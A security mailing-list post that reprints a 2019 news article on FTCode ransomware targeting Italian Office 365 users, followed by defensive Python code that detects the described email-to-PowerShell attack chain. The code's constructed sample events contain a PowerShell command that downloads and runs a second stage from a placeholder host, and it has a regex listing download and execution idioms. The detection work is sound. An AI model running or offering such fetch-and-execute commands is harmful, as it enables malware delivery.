[BreachExchange] Italians Rocked by Ransomware

Destry Winant destry at riskbasedsecurity.com
Tue Oct 22 10:01:15 EDT 2019


https://www.infosecurity-magazine.com/news/italians-rocked-by-ransomware/

Italy is experiencing a rash of ransomware attacks that play dark
German rock music while encrypting victims' files.

The musical ransomware, called FTCode, was detected by security
analysts at AppRiver in malicious email campaigns directed at Italian
Office 365 customers.

Targeted inboxes have received emails with malicious content posing as
resumes, invoices, or document scans. The emails include a Visual
Basic script (.vbs) file that downloads and blasts out Rammstein hits
while encrypting files on the victim's computer.

"The .vbs file initially launches PowerShell to download and play an
mp3 file from archive.org. At first glance, we suspected it was just a
renamed file extension for malware, a common practice to help evade
some network gateways. However, we were amused to find it launches a
Rammstein song mix," wrote AppRiver researchers.

As victims are treated to rousing renditions of "Du Hast" and "Engel,"
the script reaches out to a different domain to pull down a Jasper
malware loader. This loader, itself a .vbs file, lets the threat actors
load additional malware of their choosing.

Once the files on the user's computer have been encrypted, a note is
left on the victim's desktop directing the user to download and install
the Tor Browser and visit an onion site for further instructions.

In an attempt to establish trust with the user and show that
decryption is actually possible, the onion site offers the visitor a
chance to test file decryption with one file before they pay the full
ransom.

The cost of the ransom is set at $500 if paid within the first three
days, after which it rapidly increases to $25,000.

David Pickett, security analyst at AppRiver, warned users not to take
risks on links sent by strangers and to be particularly wary of any
content that asks to be enabled.

He said: "Users should be vigilant to never click on or open
unsolicited links or documents, especially with file types they aren’t
familiar with, such as script files (.vbs, .js, .ps1, .bat, etc.).

"Any Office file that, once opened, urges the user to Enable Content
or Enable Editing should be treated with the utmost caution and
verified from the sender out of band before doing so. If the file is
malicious, enabling content or editing disables Microsoft’s protected
view and can allow a malicious payload contained within to execute."
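The attack chain described above (mail client launches a .vbs, the
script host launches PowerShell to fetch the mp3 and then the loader)
and Pickett's warning about script file types both translate directly
into triage logic. The following is an added example written for this
page, not code from AppRiver or from the article: one check flags
attachment names ending in a script extension (the four the article
names plus a few siblings added here), the other runs over
process-creation events with assumed Sysmon-style fields
(parent_image, image, command_line). The sample events are constructed
for the example and are not real telemetry.

```python
"""Triage helpers for the FTCode-style mail campaign described above.

Check 1: does an attachment name end in one of the script extensions the
article warns about? Only the LAST extension matters to Windows, so
'CV.pdf.vbs' counts.
Check 2: does a process-creation event show the chain the article
describes: a mail client launching a script host, or the script host
launching PowerShell with a download / in-memory-execution idiom?
Field names (parent_image, image, command_line) are assumed Sysmon-style;
the sample events at the bottom are constructed, not real telemetry.
"""
import re

SCRIPT_EXTENSIONS = {
    ".vbs", ".js", ".ps1", ".bat",           # named in the article
    ".vbe", ".jse", ".wsf", ".cmd", ".hta",  # added here, same script hosts
}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
MAIL_CLIENTS = {"outlook.exe"}

# Idioms a PowerShell one-liner uses to fetch and run remote content.
DOWNLOAD_PATTERN = re.compile(
    r"downloadfile|downloadstring|invoke-webrequest|\biwr\b|"
    r"invoke-expression|\biex\b|net\.webclient|start-bitstransfer",
    re.IGNORECASE,
)
URL_PATTERN = re.compile(r"""https?://[^\s'"()]+""")


def attachment_extension(filename):
    """Lower-cased final extension. Trailing dots and spaces are dropped,
    as Windows drops them when it creates the file."""
    name = filename.strip().lower().rstrip(". ")
    dot = name.rfind(".")
    return name[dot:] if dot != -1 else ""


def is_script_attachment(filename):
    """True if double-clicking the file would hand it to a script host."""
    return attachment_extension(filename) in SCRIPT_EXTENSIONS


def _basename(image_path):
    return image_path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def detect_ftcode_chain(events):
    """Return one finding per process-creation event matching either rule."""
    findings = []
    for ev in events:
        parent, child = _basename(ev["parent_image"]), _basename(ev["image"])
        cmd = ev["command_line"]
        quoted_args = re.findall(r'"([^"]+)"', cmd)
        reason = None
        if (parent in MAIL_CLIENTS and child in SCRIPT_HOSTS
                and any(is_script_attachment(q) for q in quoted_args)):
            reason = "script host launched from mail client with script attachment"
        elif (parent in SCRIPT_HOSTS and child in POWERSHELL
                and DOWNLOAD_PATTERN.search(cmd)):
            reason = "script host spawned PowerShell with a download idiom"
        if reason:
            findings.append({"event_id": ev["id"], "parent": parent,
                             "child": child, "reason": reason,
                             "urls": URL_PATTERN.findall(cmd)})
    return findings


# Constructed sample events (hypothetical user, paths and URLs).
SAMPLE_EVENTS = [
    {  # the user opens the attachment: Outlook's child is the script host
        "id": 1,
        "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
        "image": r"C:\Windows\System32\wscript.exe",
        "command_line": r'"C:\Windows\System32\wscript.exe" "C:\Users\mrossi\AppData\Local\Temp\CV_Rossi.pdf.vbs"',
    },
    {  # the .vbs launches PowerShell to fetch and play the mp3
        "id": 2,
        "parent_image": r"C:\Windows\System32\wscript.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": "powershell -w hidden -c \"(New-Object Net.WebClient).DownloadFile('https://archive.org/download/example/mix.mp3','C:\\Users\\mrossi\\AppData\\Local\\Temp\\mix.mp3')\"",
    },
    {  # second stage: pull the loader from another domain and run it in memory
        "id": 3,
        "parent_image": r"C:\Windows\System32\wscript.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": "powershell -ep bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://loader.example.net/stage2')\"",
    },
    {  # benign admin activity: no script host in the chain, no download idiom
        "id": 4,
        "parent_image": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": "powershell -c \"Get-ChildItem C:\\Logs | Measure-Object\"",
    },
]

if __name__ == "__main__":
    for name in ("CV_Rossi.pdf.vbs", "Fattura.VBS ", "scan.docx"):
        print(f"{name!r}: script attachment = {is_script_attachment(name)}")
    for finding in detect_ftcode_chain(SAMPLE_EVENTS):
        print(finding)
```

Events 1 to 3 are flagged and event 4 is not. Against real Sysmon
Event ID 1 data the second rule will also fire on administrators who
legitimately drive PowerShell from logon scripts, so scope it by
user or parent path before alerting on it rather than just logging it.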

